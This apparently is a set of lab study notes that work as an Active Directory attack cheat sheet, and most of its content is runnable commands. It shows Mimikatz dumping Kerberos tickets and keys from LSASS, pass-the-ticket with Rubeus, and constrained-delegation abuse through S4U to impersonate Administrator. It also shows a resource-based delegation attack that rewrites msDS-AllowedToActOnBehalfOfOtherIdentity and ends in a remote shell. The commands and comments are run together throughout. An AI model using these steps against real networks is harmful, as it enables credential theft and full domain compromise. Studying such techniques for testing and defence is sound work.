It is possible to extract the TGTs from the service's LSASS process using Mimikatz and perform pass the ticket.
# Extract the TGTInvoke-Mimikatz-Command '"sekurlsa::tickets /export"'# Pass the ticketInvoke-Mimikatz-Command '"kerberos::ptt TGT.kirbi"'Rubeus.exe ptt /ticket:"base64 | file.kirbi"# Rubues allows base64 format as alternative
Printer bug
The printer bug uses an RPC call of MS-RPRN which allows any domain user can force any machine that running the Spooler service to connect to second a machine of the domain user's choice.
Constrained Delegation allowing specified services on specified computers to use a user TGT in order to communicate with the any other service.
in order to create a more restrictive delegation mechanism, Microsoft develop two Kerberos extensions known as Service for user (S4U):
Service for User to Self (S4U2self) - allows a service to obtain forwardable TGS to itself on behalf of user.
Service for User to Proxy (S4U2proxy) - allows a service to obtain a TGS to another service on behalf of user.
Note that the other services are from white list controlled by msDS-AllowedToDelegateTo attribute.
Rubeus.exe s4u /user:websvc /aes256:<aes256_key> /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.local /ptt
# You can change the target service in the ticketRubeus.exe s4u /user:dcorp-adminsrv$ /aes256:<aes256_key> /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
Check if worked
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Resource Based Delegation
Instead of the white list of SPNs controlled by msDS-AllowedToDelegateTo attribute, resource based controlled by the msDS-AllowedToActOnBehalfOfOtherIdentity
To abuse RBCD we need Write permissions over the target machine msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Enumerate
# Check if allowed to create machinesGet-DomainObject-Identity "dc=domain,dc=local"-Domain domain.local | select ms-ds-machineaccountquota# Check Write premissions to modify msDS-AllowedToActOnBehalfOfOtherIdentity attribute on target machineFind-InterestingDomainACL|?{$_.identityreferencename-match'ciadmin'}# Check if RBCD is set using PowerView - This can be used to verify alsoGet-DomainRBCD
$TargetComputer ='dcorp-mgmt'$FakeComputer ='dcorp-student483'# Using PowerView$ComputerSid =Get-DomainComputer $FakeComputer -Properties objectsid | Select -Expand objectsid$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes =New-Object byte[] ($SD.BinaryLength)$SD.GetBinaryForm($SDBytes,0)Get-DomainComputer $TargetComputer |Set-DomainObject-Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}# One liner using PowerViewSet-DomainRBCD-Identity $TargetComputer -DelegateFrom $FakeComputer -Verbose # Using AD ModuleSet-ADComputer-Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $FakeComputer # VerifyGet-DomainComputer dcorp-mgmt -Properties 'msds-allowedtoactonbehalfofotheridentity'# Verify Resultmsds-allowedtoactonbehalfofotheridentity----------------------------------------{1,0,4,128...}# Verify using ADModuleGet-ADComputer dcorp-mgmt -Properties PrincipalsAllowedToDelegateToAccount
Abuse using Rubeus
## Get the fake machine hashRubeus.exe hash /password:123456/user:dcorp-student483 /domain:dollarcorp.moneycorp.local## If used AD Module need to extract the hash from lsass using mimikatzInvoke-Mimikatz-Command '"sekurlsa::ekeys"'# ImporsnateRubeus.exe s4u /user:dcorp-student483$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:http/dcorp-mgmt /ptt
# Verify (winrs on this case)winrs -r:dcorp-mgmt cmd